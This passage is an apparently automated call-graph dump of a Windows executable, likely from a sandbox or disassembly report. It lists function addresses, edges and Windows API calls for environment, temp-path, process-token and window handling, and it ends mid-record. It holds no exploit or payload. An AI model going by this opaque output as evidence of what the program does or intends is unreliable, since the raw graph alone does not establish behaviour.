7ff6fabeeacc 17922->18226 17923->17721 17923->17722 17925 7ff6fabee444 74 API calls 17925->17919 17926 7ff6fabe1965 17927 7ff6fabe1981 17926->17927 17928 7ff6fabe1969 17926->17928 18230 7ff6fabee794 17927->18230 18233 7ff6fabe1db0 17928->18233 17932 7ff6fabe199f 17934 7ff6fabe1db0 80 API calls 17932->17934 17933 7ff6fabe19b7 17935 7ff6fabe19ce 17933->17935 17936 7ff6fabe19e6 17933->17936 17934->17955 17937 7ff6fabe1db0 80 API calls 17935->17937 17938 7ff6fabe1bd0 49 API calls 17936->17938 17937->17955 17939 7ff6fabe19fd 17938->17939 17940 7ff6fabe1bd0 49 API calls 17939->17940 17941 7ff6fabe1a48 17940->17941 17942 7ff6fabeeacc 73 API calls 17941->17942 17943 7ff6fabe1a6c 17942->17943 17944 7ff6fabe1a81 17943->17944 17945 7ff6fabe1a99 17943->17945 17946 7ff6fabe1db0 80 API calls 17944->17946 17947 7ff6fabee794 _fread_nolock 53 API calls 17945->17947 17946->17955 17948 7ff6fabe1aae 17947->17948 17949 7ff6fabe1ab4 17948->17949 17950 7ff6fabe1acc 17948->17950 17951 7ff6fabe1db0 80 API calls 17949->17951 18238 7ff6fabee508 17950->18238 17951->17955 17954 7ff6fabe1df0 81 API calls 17954->17955 17955->17925 17957 7ff6fabe704a 17956->17957 17958 7ff6fabe7800 2 API calls 17957->17958 17959 7ff6fabe7069 GetEnvironmentVariableW 17958->17959 17960 7ff6fabe70d2 17959->17960 17961 7ff6fabe7086 ExpandEnvironmentStringsW 17959->17961 17963 7ff6fabea9b0 _log10_special 8 API calls 17960->17963 17961->17960 17962 7ff6fabe70a8 17961->17962 17964 7ff6fabe78b0 2 API calls 17962->17964 17965 7ff6fabe70e4 17963->17965 17966 7ff6fabe70ba 17964->17966 17965->17743 17967 7ff6fabea9b0 _log10_special 8 API calls 17966->17967 17968 7ff6fabe70ca 17967->17968 17968->17743 17970 7ff6fabe7800 2 API calls 17969->17970 17971 7ff6fabe71c4 17970->17971 18554 7ff6fabf7dec 17971->18554 17973 7ff6fabe71d6 __vcrt_freefls 17973->17759 17975 7ff6fabe1bf5 17974->17975 17976 7ff6fabf4764 49 API calls 17975->17976 17977 7ff6fabe1c18 17976->17977 17977->17770 17979 7ff6fabe74a5 17978->17979 18572 7ff6fabe6d20 GetCurrentProcess OpenProcessToken 17979->18572 17982 7ff6fabe6d20 7 API calls 17983 7ff6fabe74d1 17982->17983 17984 7ff6fabe7504 17983->17984 17985 7ff6fabe74ea 17983->17985 17987 7ff6fabe6e10 48 API calls 17984->17987 18582 7ff6fabe6e10 17985->18582 17989 7ff6fabe7517 LocalFree LocalFree 17987->17989 17990 7ff6fabe7533 17989->17990 17992 7ff6fabe753f 17989->17992 17991 7ff6fabe1e50 78 API calls 17990->17991 17991->17992 17993 7ff6fabea9b0 _log10_special 8 API calls 17992->17993 17994 7ff6fabe2a89 17993->17994 17994->17768 17995 7ff6fabe6e70 17994->17995 17996 7ff6fabe6e88 17995->17996 17997 7ff6fabe6f0a GetTempPathW GetCurrentProcessId 17996->17997 17998 7ff6fabe6eac 17996->17998 18777 7ff6fabe7610 17997->18777 18000 7ff6fabe7040 14 API calls 17998->18000 18001 7ff6fabe6eb8 18000->18001 18784 7ff6fabe69a0 18001->18784 18008 7ff6fabe6f38 __vcrt_freefls 18029 7ff6fabe7822 MultiByteToWideChar 18028->18029 18031 7ff6fabe7846 18028->18031 18029->18031 18032 7ff6fabe785c __vcrt_freefls 18029->18032 18030 7ff6fabe7863 MultiByteToWideChar 18030->18032 18031->18030 18031->18032 18032->17765 18034 7ff6fabe57c5 18033->18034 18035 7ff6fabe2b44 18034->18035 18036 7ff6fabe1db0 80 API calls 18034->18036 18037 7ff6fabe5d20 18035->18037 18036->18035 18038 7ff6fabe5d50 18037->18038 18039 7ff6fabe5d6a __vcrt_freefls 18037->18039 18038->18039 18946 7ff6fabe1420 18038->18946 18039->17783 18041 7ff6fabe5d74 18041->18039 18042 7ff6fabe3210 49 API calls 18041->18042 18043 7ff6fabe5d96 18042->18043 18044 7ff6fabe3210 49 API calls 18043->18044 18048 7ff6fabe5d9b 18043->18048 18046 7ff6fabe5dba 18044->18046 18045 7ff6fabe1df0 81 API calls 18045->18039 18047 7ff6fabe3210 49 API calls 18046->18047 18046->18048 18047->18048 18048->18045 18049 7ff6fabe5e4f memcpy_s __vcrt_freefls 18048->18049 18049->17783 18051 7ff6fabe22ae memcpy_s 18050->18051 18054 7ff6fabe24a7 18051->18054 18056 7ff6fabe1bd0 49 API calls 18051->18056 18057 7ff6fabe24c9 18051->18057 18061 7ff6fabe24a9 18051->18061 18063 7ff6fabe1df0 81 API calls 18051->18063 18067 7ff6fabe24b7 18051->18067 19007 7ff6fabe3140 18051->19007 19013 7ff6fabe6700 18051->19013 19024 7ff6fabe15a0 18051->19024 19062 7ff6fabe5b00 18051->19062 19066 7ff6fabe2d70 18051->19066 19110 7ff6fabe3030 18051->19110 18052 7ff6fabea9b0 _log10_special 8 API calls 18053 7ff6fabe254e 18052->18053 18053->17716 18069 7ff6fabe7420 LocalFree 18053->18069 18054->18052 18056->18051 18059 7ff6fabe1df0 81 API calls 18057->18059 18059->18054 18064 7ff6fabe1df0 81 API calls 18061->18064 18063->18051 18064->18054 18068 7ff6fabe1df0 81 API calls 18067->18068 18068->18054 18071 7ff6fabe31ac 18070->18071 18072 7ff6fabe7800 2 API calls 18071->18072 18073 7ff6fabe31d4 18072->18073 18074 7ff6fabe7800 2 API calls 18073->18074 18075 7ff6fabe31e7 18074->18075 19230 7ff6fabf5db4 18075->19230 18078 7ff6fabea9b0 _log10_special 8 API calls 18079 7ff6fabe2846 18078->18079 18079->17727 18080 7ff6fabe6870 18079->18080 18081 7ff6fabe6894 18080->18081 18082 7ff6fabeeacc 73 API calls 18081->18082 18087 7ff6fabe696b __vcrt_freefls 18081->18087 18083 7ff6fabe68b0 18082->18083 18083->18087 19621 7ff6fabf7664 18083->19621 18085 7ff6fabeeacc 73 API calls 18088 7ff6fabe68c5 18085->18088 18086 7ff6fabee794 _fread_nolock 53 API calls 18086->18088 18087->17732 18088->18085 18088->18086 18088->18087 18090 7ff6fabee474 18089->18090 19636 7ff6fabee220 18090->19636 18092 7ff6fabee48d 18092->17727 18094 7ff6fabe1e1a 18093->18094 18095 7ff6fabe1d60 78 API calls 18094->18095 18096 7ff6fabe1e2c 18095->18096 18097 7ff6fabe1c30 80 API calls 18096->18097 18098 7ff6fabe1e3b 18097->18098 18098->17716 18100 7ff6fabe7454 GetCurrentProcessId GetWindowThreadProcessId 18099->18100 18101 7ff6fabe2999 18099->18101 18100->18101 18102 7ff6fabe7473 18100->18102 18101->17734 18102->18101 18103 7ff6fabe7479 ShowWindow 18102->18103 18103->18101 18105 7ff6fabe75c4 GetCurrentProcessId GetWindowThreadProcessId 18104->18105 18106 7ff6fabe75f7 18104->18106 18105->18106 18107 7ff6fabe75e3 18105->18107 18106->17734 18107->18106 18108 7ff6fabe75e9 ShowWindow 18107->18108 18108->18106 18110 7ff6fabe1bd0 49 API calls 18109->18110 18111 7ff6fabe30dd 18110->18111 18111->17750 18113 7ff6fabe1bd0 49 API calls 18112->18113 18114 7ff6fabe3240 18113->18114 18114->17770 18130 7ff6fabe580c 18115->18130 18116 7ff6fabe592f 18117 7ff6fabea9b0 _log10_special 8 API calls 18116->18117 18119 7ff6fabe5941 18117->18119 18118 7ff6fabe17c0 45 API calls 18118->18130 18119->17788 18120 7ff6fabe59ad 18122 7ff6fabe1df0 81 API calls 18120->18122 18121 7ff6fabe1bd0 49 API calls 18121->18130 18122->18116 18123 7ff6fabe599a 18124 7ff6fabe1df0 81 API calls 18123->18124 18124->18116 18125 7ff6fabe3140 10 API calls 18125->18130 18126 7ff6fabe595d 18128 7ff6fabe1df0 81 API calls 18126->18128 18127 7ff6fabe6700 52 API calls 18127->18130 18128->18116 18129 7ff6fabe1df0 81 API calls 18129->18130 18130->18116 18130->18118 18130->18120 18130->18121 18130->18123 18130->18125 18130->18126 18130->18127 18130->18129 18131 7ff6fabe5987 18130->18131 18132 7ff6fabe15a0 115 API calls 18130->18132 18134 7ff6fabe5970 18130->18134 18133 7ff6fabe1df0 81 API calls 18131->18133 18132->18130 18133->18116 18135 7ff6fabe1df0 81 API calls 18134->18135 18135->18116 19647 7ff6fabe73d0 18136->19647 18138 7ff6fabe5ba9 18139 7ff6fabe73d0 3 API calls 18138->18139 18140 7ff6fabe5bbc 18139->18140 18141 7ff6fabe5bef 18140->18141 18142 7ff6fabe5bd4 18140->18142 18143 7ff6fabe1df0 81 API calls 18141->18143 19651 7ff6fabe60c0 GetProcAddress 18142->19651 18145 7ff6fabe2b85 18143->18145 18145->17802 18146 7ff6fabe5ef0 18145->18146 18147 7ff6fabe5f0d 18146->18147 18148 7ff6fabe1df0 81 API calls 18147->18148 18151 7ff6fabe5f74 18147->18151 18149 7ff6fabe5f5c 18148->18149 18151->17802 18155 7ff6fabe5a13 18152->18155 18157 7ff6fabe59e2 18152->18157 18153 7ff6fabe5aca 18153->18155 19711 7ff6fabe73b0 FreeLibrary 18153->19711 18155->17786 18157->18153 18157->18155 19710 7ff6fabe73b0 FreeLibrary 18157->19710 19712 7ff6fabe4d50 18158->19712 18162 7ff6fabe2261 18166 7ff6fabe2279 18162->18166 18167 7ff6fabe2560 18166->18167 18168 7ff6fabe256e 18167->18168 18170 7ff6fabe257f 18168->18170 19985 7ff6fabe73b0 FreeLibrary 18168->19985 18170->17797 18178 7ff6fabf4f7c EnterCriticalSection 18171->18178 18180 7ff6fabe25ac GetModuleFileNameW 18179->18180 18180->17897 18180->17898 18182 7ff6fabe772f FindClose 18181->18182 18183 7ff6fabe7742 18181->18183 18182->18183 18184 7ff6fabea9b0 _log10_special 8 API calls 18183->18184 18185 7ff6fabe2602 18184->18185 18185->17902 18185->17903 18187 7ff6fabe1f0b 18186->18187 18207 7ff6fabf4640 18187->18207 18189 7ff6fabe1f29 FormatMessageW 18190 7ff6fabe1f73 18189->18190 18214 7ff6fabe1d60 18190->18214 18194 7ff6fabe77b0 GetFinalPathNameByHandleW CloseHandle 18193->18194 18195 7ff6fabe2618 18193->18195 18194->18195 18195->17910 18195->17911 18197 7ff6fabe1e70 18196->18197 18198 7ff6fabe1d60 78 API calls 18197->18198 18199 7ff6fabe1e8e 18198->18199 18200 7ff6fabf4640 78 API calls 18199->18200 18201 7ff6fabe1ec0 18200->18201 18201->17914 18203 7ff6fabe7905 18202->18203 18204 7ff6fabe78da WideCharToMultiByte 18202->18204 18205 7ff6fabe7922 WideCharToMultiByte 18203->18205 18206 7ff6fabe791b __vcrt_freefls 18203->18206 18204->18203 18204->18206 18205->18206 18206->17909 18208 7ff6fabf466a 18207->18208 18209 7ff6fabf46a2 18208->18209 18211 7ff6fabf46d5 18208->18211 18210 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18209->18210 18213 7ff6fabf46cb 18210->18213 18218 7ff6fabeef78 18211->18218 18213->18189 18215 7ff6fabe1d86 18214->18215 18216 7ff6fabf4640 78 API calls 18215->18216 18217 7ff6fabe1d9c 18216->18217 18217->17914 18225 7ff6fabf4f7c EnterCriticalSection 18218->18225 18227 7ff6fabeeafc 18226->18227 18244 7ff6fabee85c 18227->18244 18229 7ff6fabeeb15 18229->17926 18256 7ff6fabee7b4 18230->18256 18270 7ff6fabe1c30 18233->18270 18239 7ff6fabee511 18238->18239 18241 7ff6fabe1ae6 18238->18241 18240 7ff6fabfb108 _get_daylight 11 API calls 18239->18240 18242 7ff6fabee516 18240->18242 18241->17954 18241->17955 18243 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 18242->18243 18243->18241 18245 7ff6fabee8c6 18244->18245 18246 7ff6fabee886 18244->18246 18245->18246 18248 7ff6fabee8d2 18245->18248 18247 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18246->18247 18250 7ff6fabee8ad 18247->18250 18255 7ff6fabf4f7c EnterCriticalSection 18248->18255 18250->18229 18257 7ff6fabee7de 18256->18257 18258 7ff6fabe1999 18256->18258 18257->18258 18259 7ff6fabee7ed memcpy_s 18257->18259 18260 7ff6fabee82a 18257->18260 18258->17932 18258->17933 18263 7ff6fabfb108 _get_daylight 11 API calls 18259->18263 18269 7ff6fabf4f7c EnterCriticalSection 18260->18269 18265 7ff6fabee802 18263->18265 18267 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 18265->18267 18267->18258 18271 7ff6fabe1c40 18270->18271 18287 7ff6fabf4764 18271->18287 18274 7ff6fabe7800 2 API calls 18275 7ff6fabe1ca0 18274->18275 18276 7ff6fabe1caa 18275->18276 18277 7ff6fabe1cc8 18275->18277 18278 7ff6fabe1d60 78 API calls 18276->18278 18305 7ff6fabe1d10 18277->18305 18280 7ff6fabe1cc6 18278->18280 18281 7ff6fabea9b0 _log10_special 8 API calls 18280->18281 18282 7ff6fabe1cf1 18281->18282 18283 7ff6fabf50d0 18282->18283 18284 7ff6fabf50fb 18283->18284 18540 7ff6fabf4f94 18284->18540 18290 7ff6fabf47be 18287->18290 18288 7ff6fabf47e3 18289 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18288->18289 18295 7ff6fabf480d 18289->18295 18290->18288 18291 7ff6fabf481f 18290->18291 18309 7ff6fabf1658 18291->18309 18293 7ff6fabf48fc 18294 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18293->18294 18294->18295 18296 7ff6fabea9b0 _log10_special 8 API calls 18295->18296 18297 7ff6fabe1c88 18296->18297 18297->18274 18299 7ff6fabf4920 18299->18293 18303 7ff6fabf492a 18299->18303 18300 7ff6fabf48d1 18301 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18300->18301 18301->18295 18302 7ff6fabf48c8 18302->18293 18302->18300 18304 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18303->18304 18304->18295 18306 7ff6fabe1d36 18305->18306 18525 7ff6fabf451c 18306->18525 18308 7ff6fabe1d4c 18308->18280 18310 7ff6fabf1696 18309->18310 18315 7ff6fabf1686 18309->18315 18311 7ff6fabf169f 18310->18311 18319 7ff6fabf16cd 18310->18319 18312 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18311->18312 18313 7ff6fabf16c5 18312->18313 18313->18293 18313->18299 18313->18300 18313->18302 18314 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18314->18313 18315->18314 18318 7ff6fabf197c 18321 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18318->18321 18319->18313 18319->18315 18319->18318 18323 7ff6fabf2a28 18319->18323 18349 7ff6fabf2108 18319->18349 18379 7ff6fabf11a0 18319->18379 18382 7ff6fabf4110 18319->18382 18321->18315 18324 7ff6fabf2add 18323->18324 18325 7ff6fabf2a6a 18323->18325 18328 7ff6fabf2ae2 18324->18328 18329 7ff6fabf2b37 18324->18329 18326 7ff6fabf2a70 18325->18326 18327 7ff6fabf2b07 18325->18327 18336 7ff6fabf2a75 18326->18336 18340 7ff6fabf2b46 18326->18340 18406 7ff6fabeffc8 18327->18406 18330 7ff6fabf2ae4 18328->18330 18331 7ff6fabf2b17 18328->18331 18329->18327 18329->18340 18346 7ff6fabf2aa0 18329->18346 18333 7ff6fabf2a85 18330->18333 18339 7ff6fabf2af3 18330->18339 18413 7ff6fabefbb8 18331->18413 18348 7ff6fabf2b75 18333->18348 18388 7ff6fabf3850 18333->18388 18336->18333 18337 7ff6fabf2ab8 18336->18337 18336->18346 18337->18348 18398 7ff6fabf3d0c 18337->18398 18339->18327 18342 7ff6fabf2af8 18339->18342 18340->18348 18420 7ff6fabf03d8 18340->18420 18342->18348 18402 7ff6fabf3ea4 18342->18402 18343 7ff6fabea9b0 _log10_special 8 API calls 18344 7ff6fabf2e0b 18343->18344 18344->18319 18346->18348 18427 7ff6fabfe6a0 18346->18427 18348->18343 18350 7ff6fabf2113 18349->18350 18351 7ff6fabf2129 18349->18351 18352 7ff6fabf2add 18350->18352 18353 7ff6fabf2a6a 18350->18353 18359 7ff6fabf2167 18350->18359 18354 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18351->18354 18351->18359 18357 7ff6fabf2ae2 18352->18357 18358 7ff6fabf2b37 18352->18358 18355 7ff6fabf2a70 18353->18355 18356 7ff6fabf2b07 18353->18356 18354->18359 18362 7ff6fabf2b46 18355->18362 18366 7ff6fabf2a75 18355->18366 18361 7ff6fabeffc8 38 API calls 18356->18361 18360 7ff6fabf2b17 18357->18360 18363 7ff6fabf2ae4 18357->18363 18358->18356 18358->18362 18377 7ff6fabf2aa0 18358->18377 18359->18319 18364 7ff6fabefbb8 38 API calls 18360->18364 18361->18377 18368 7ff6fabf03d8 38 API calls 18362->18368 18378 7ff6fabf2b75 18362->18378 18369 7ff6fabf2af3 18363->18369 18370 7ff6fabf2a85 18363->18370 18364->18377 18365 7ff6fabf3850 47 API calls 18365->18377 18367 7ff6fabf2ab8 18366->18367 18366->18370 18366->18377 18371 7ff6fabf3d0c 47 API calls 18367->18371 18367->18378 18368->18377 18369->18356 18372 7ff6fabf2af8 18369->18372 18370->18365 18370->18378 18371->18377 18374 7ff6fabf3ea4 37 API calls 18372->18374 18372->18378 18373 7ff6fabea9b0 _log10_special 8 API calls 18375 7ff6fabf2e0b 18373->18375 18374->18377 18375->18319 18376 7ff6fabfe6a0 47 API calls 18376->18377 18377->18376 18377->18378 18378->18373 18500 7ff6fabef18c 18379->18500 18383 7ff6fabf4127 18382->18383 18517 7ff6fabfd800 18383->18517 18389 7ff6fabf3872 18388->18389 18437 7ff6fabeeff8 18389->18437 18394 7ff6fabf39af 18396 7ff6fabf4110 45 API calls 18394->18396 18397 7ff6fabf3a38 18394->18397 18395 7ff6fabf4110 45 API calls 18395->18394 18396->18397 18397->18346 18399 7ff6fabf3d24 18398->18399 18401 7ff6fabf3d8c 18398->18401 18400 7ff6fabfe6a0 47 API calls 18399->18400 18399->18401 18400->18401 18401->18346 18405 7ff6fabf3ec5 18402->18405 18403 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18404 7ff6fabf3ef6 18403->18404 18404->18346 18405->18403 18405->18404 18407 7ff6fabefffb 18406->18407 18408 7ff6fabf002a 18407->18408 18410 7ff6fabf00e7 18407->18410 18409 7ff6fabeeff8 12 API calls 18408->18409 18412 7ff6fabf0067 18408->18412 18409->18412 18411 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18410->18411 18411->18412 18412->18346 18414 7ff6fabefbeb 18413->18414 18415 7ff6fabefc1a 18414->18415 18418 7ff6fabefcd7 18414->18418 18416 7ff6fabefc57 18415->18416 18417 7ff6fabeeff8 12 API calls 18415->18417 18416->18346 18417->18416 18419 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18418->18419 18419->18416 18421 7ff6fabf040b 18420->18421 18422 7ff6fabf043a 18421->18422 18424 7ff6fabf04f7 18421->18424 18423 7ff6fabeeff8 12 API calls 18422->18423 18426 7ff6fabf0477 18422->18426 18423->18426 18425 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18424->18425 18425->18426 18426->18346 18428 7ff6fabfe6c8 18427->18428 18429 7ff6fabfe70d 18428->18429 18430 7ff6fabf4110 45 API calls 18428->18430 18431 7ff6fabfe6cd memcpy_s 18428->18431 18433 7ff6fabfe6f6 memcpy_s 18428->18433 18429->18431 18429->18433 18434 7ff6fac005f4 WideCharToMultiByte 18429->18434 18430->18429 18431->18346 18432 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18432->18431 18433->18431 18433->18432 18435 7ff6fabfe7e9 18434->18435 18435->18431 18436 7ff6fabfe7fe GetLastError 18435->18436 18436->18431 18436->18433 18438 7ff6fabef02f 18437->18438 18444 7ff6fabef01e 18437->18444 18439 7ff6fabfd444 _fread_nolock 12 API calls 18438->18439 18438->18444 18440 7ff6fabef05c 18439->18440 18441 7ff6fabef070 18440->18441 18442 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18440->18442 18443 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18441->18443 18442->18441 18443->18444 18445 7ff6fabfe3b8 18444->18445 18446 7ff6fabfe3d5 18445->18446 18447 7ff6fabfe408 18445->18447 18448 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18446->18448 18447->18446 18449 7ff6fabfe43a 18447->18449 18458 7ff6fabf398d 18448->18458 18455 7ff6fabfe54d 18449->18455 18460 7ff6fabfe482 18449->18460 18450 7ff6fabfe63f 18491 7ff6fabfd8a4 18450->18491 18452 7ff6fabfe605 18484 7ff6fabfdc3c 18452->18484 18454 7ff6fabfe5d4 18477 7ff6fabfdf1c 18454->18477 18455->18450 18455->18452 18455->18454 18457 7ff6fabfe597 18455->18457 18459 7ff6fabfe58d 18455->18459 18467 7ff6fabfe14c 18457->18467 18458->18394 18458->18395 18459->18452 18462 7ff6fabfe592 18459->18462 18460->18458 18463 7ff6fabfa02c __std_exception_copy 37 API calls 18460->18463 18462->18454 18462->18457 18464 7ff6fabfe53a 18463->18464 18464->18458 18465 7ff6fabfa4c4 _isindst 17 API calls 18464->18465 18466 7ff6fabfe69c 18465->18466 18468 7ff6fac03eac 38 API calls 18467->18468 18469 7ff6fabfe199 18468->18469 18470 7ff6fac038f4 37 API calls 18469->18470 18471 7ff6fabfe1f4 18470->18471 18472 7ff6fabfe1f8 18471->18472 18473 7ff6fabfe249 18471->18473 18474 7ff6fabfe214 18471->18474 18472->18458 18475 7ff6fabfdd38 45 API calls 18473->18475 18476 7ff6fabfdff4 45 API calls 18474->18476 18475->18472 18476->18472 18478 7ff6fac03eac 38 API calls 18477->18478 18479 7ff6fabfdf66 18478->18479 18480 7ff6fac038f4 37 API calls 18479->18480 18481 7ff6fabfdfb6 18480->18481 18482 7ff6fabfdfba 18481->18482 18483 7ff6fabfdff4 45 API calls 18481->18483 18482->18458 18483->18482 18485 7ff6fac03eac 38 API calls 18484->18485 18486 7ff6fabfdc87 18485->18486 18487 7ff6fac038f4 37 API calls 18486->18487 18488 7ff6fabfdcdf 18487->18488 18489 7ff6fabfdce3 18488->18489 18490 7ff6fabfdd38 45 API calls 18488->18490 18489->18458 18490->18489 18492 7ff6fabfd91c 18491->18492 18493 7ff6fabfd8e9 18491->18493 18495 7ff6fabfd934 18492->18495 18498 7ff6fabfd9b5 18492->18498 18494 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18493->18494 18497 7ff6fabfd915 memcpy_s 18494->18497 18496 7ff6fabfdc3c 46 API calls 18495->18496 18496->18497 18497->18458 18498->18497 18499 7ff6fabf4110 45 API calls 18498->18499 18499->18497 18501 7ff6fabef1b9 18500->18501 18502 7ff6fabef1cb 18500->18502 18503 7ff6fabfb108 _get_daylight 11 API calls 18501->18503 18504 7ff6fabef1d8 18502->18504 18508 7ff6fabef215 18502->18508 18505 7ff6fabef1be 18503->18505 18506 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18504->18506 18507 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 18505->18507 18514 7ff6fabef1c9 18506->18514 18507->18514 18509 7ff6fabef2be 18508->18509 18510 7ff6fabfb108 _get_daylight 11 API calls 18508->18510 18511 7ff6fabfb108 _get_daylight 11 API calls 18509->18511 18509->18514 18512 7ff6fabef2b3 18510->18512 18513 7ff6fabef368 18511->18513 18515 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 18512->18515 18516 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 18513->18516 18514->18319 18515->18509 18516->18514 18518 7ff6fabfd819 18517->18518 18520 7ff6fabf414f 18517->18520 18519 7ff6fac03104 45 API calls 18518->18519 18518->18520 18519->18520 18521 7ff6fabfd86c 18520->18521 18522 7ff6fabfd885 18521->18522 18523 7ff6fabf415f 18521->18523 18522->18523 18524 7ff6fac02450 45 API calls 18522->18524 18523->18319 18524->18523 18526 7ff6fabf4546 18525->18526 18527 7ff6fabf457e 18526->18527 18529 7ff6fabf45b1 18526->18529 18528 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18527->18528 18531 7ff6fabf45a7 18528->18531 18532 7ff6fabeefb8 18529->18532 18531->18308 18539 7ff6fabf4f7c EnterCriticalSection 18532->18539 18553 7ff6fabf7fc4 EnterCriticalSection 18540->18553 18555 7ff6fabf7e0c 18554->18555 18556 7ff6fabf7df9 18554->18556 18564 7ff6fabf7a70 18555->18564 18557 7ff6fabfb108 _get_daylight 11 API calls 18556->18557 18559 7ff6fabf7dfe 18557->18559 18561 7ff6fabfa4a4 _invalid_parameter_noinfo 37 API calls 18559->18561 18562 7ff6fabf7e0a 18561->18562 18562->17973 18571 7ff6fac001d8 EnterCriticalSection 18564->18571 18573 7ff6fabe6de3 __vcrt_freefls 18572->18573 18574 7ff6fabe6d61 GetTokenInformation 18572->18574 18576 7ff6fabe6dfc 18573->18576 18577 7ff6fabe6df6 CloseHandle 18573->18577 18575 7ff6fabe6d82 GetLastError 18574->18575 18578 7ff6fabe6d8d 18574->18578 18575->18573 18575->18578 18576->17982 18577->18576 18578->18573 18579 7ff6fabe6da9 GetTokenInformation 18578->18579 18579->18573 18580 7ff6fabe6dcc 18579->18580 18580->18573 18581 7ff6fabe6dd6 ConvertSidToStringSidW 18580->18581 18581->18573 18583 7ff6fabe6e35 18582->18583 18586 7ff6fabf49b8 18583->18586 18587 7ff6fabf4a12 18586->18587 18588 7ff6fabf4a37 18587->18588 18590 7ff6fabf4a73 18587->18590 18589 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18588->18589 18592 7ff6fabf4a61 18589->18592 18604 7ff6fabf1ca8 18590->18604 18593 7ff6fabea9b0 _log10_special 8 API calls 18592->18593 18595 7ff6fabe6e58 18593->18595 18594 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18594->18592 18595->17989 18597 7ff6fabf4b7a 18600 7ff6fabf4b54 18597->18600 18601 7ff6fabf4b84 18597->18601 18598 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18598->18592 18599 7ff6fabf4b20 18599->18600 18603 7ff6fabf4b29 18599->18603 18600->18594 18602 7ff6fabfa0e4 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 18601->18602 18602->18592 18603->18598 18605 7ff6fabf1ce6 18604->18605 18606 7ff6fabf1cd6 18604->18606 18607 7ff6fabf1cef 18605->18607 18611 7ff6fabf1d1d 18605->18611 18609 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18606->18609 18610 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18607->18610 18608 7ff6fabf1d15 18608->18597 18608->18599 18608->18600 18608->18603 18609->18608 18610->18608 18611->18606 18611->18608 18615 7ff6fabf32f0 18611->18615 18648 7ff6fabf2440 18611->18648 18685 7ff6fabf1230 18611->18685 18616 7ff6fabf3332 18615->18616 18617 7ff6fabf33a3 18615->18617 18620 7ff6fabf33cd 18616->18620 18621 7ff6fabf3338 18616->18621 18618 7ff6fabf33fc 18617->18618 18619 7ff6fabf33a8 18617->18619 18627 7ff6fabf3413 18618->18627 18628 7ff6fabf3406 18618->18628 18633 7ff6fabf340b 18618->18633 18622 7ff6fabf33dd 18619->18622 18623 7ff6fabf33aa 18619->18623 18704 7ff6fabf01cc 18620->18704 18624 7ff6fabf336c 18621->18624 18625 7ff6fabf333d 18621->18625 18711 7ff6fabefdbc 18622->18711 18626 7ff6fabf334c 18623->18626 18635 7ff6fabf33b9 18623->18635 18630 7ff6fabf3343 18624->18630 18624->18633 18625->18627 18625->18630 18646 7ff6fabf343c 18626->18646 18688 7ff6fabf3aa4 18626->18688 18718 7ff6fabf3ff8 18627->18718 18628->18620 18628->18633 18630->18626 18636 7ff6fabf337e 18630->18636 18643 7ff6fabf3367 18630->18643 18633->18646 18722 7ff6fabf05dc 18633->18722 18635->18620 18636->18646 18643->18646 18649 7ff6fabf2464 18648->18649 18650 7ff6fabf244e 18648->18650 18651 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18649->18651 18654 7ff6fabf24a4 18649->18654 18652 7ff6fabf3332 18650->18652 18653 7ff6fabf33a3 18650->18653 18650->18654 18651->18654 18657 7ff6fabf33cd 18652->18657 18658 7ff6fabf3338 18652->18658 18655 7ff6fabf33fc 18653->18655 18656 7ff6fabf33a8 18653->18656 18654->18611 18664 7ff6fabf3413 18655->18664 18665 7ff6fabf3406 18655->18665 18670 7ff6fabf340b 18655->18670 18659 7ff6fabf33dd 18656->18659 18660 7ff6fabf33aa 18656->18660 18666 7ff6fabf01cc 38 API calls 18657->18666 18661 7ff6fabf336c 18658->18661 18662 7ff6fabf333d 18658->18662 18661->18670 18662->18664 18665->18657 18665->18670 18760 7ff6fabef440 18685->18760 18705 7ff6fabf01ff 18704->18705 18761 7ff6fabef475 18760->18761 18762 7ff6fabef487 18760->18762 18763 7ff6fabfb108 _get_daylight 11 API calls 18761->18763 18765 7ff6fabef495 18762->18765 18769 7ff6fabef4d1 18762->18769 18764 7ff6fabef47a 18763->18764 18767 7ff6fabfa3d8 _invalid_parameter_noinfo 37 API calls 18765->18767 18768 7ff6fabef84d 18769->18768 18770 7ff6fabfb108 _get_daylight 11 API calls 18769->18770 18778 7ff6fabe7635 18777->18778 18779 7ff6fabf49b8 48 API calls 18778->18779 18780 7ff6fabe7654 18779->18780 18780->18008 18785 7ff6fabe69ac 18784->18785 18786 7ff6fabe7800 2 API calls 18785->18786 18947 7ff6fabe31a0 108 API calls 18946->18947 18948 7ff6fabe1443 18947->18948 18949 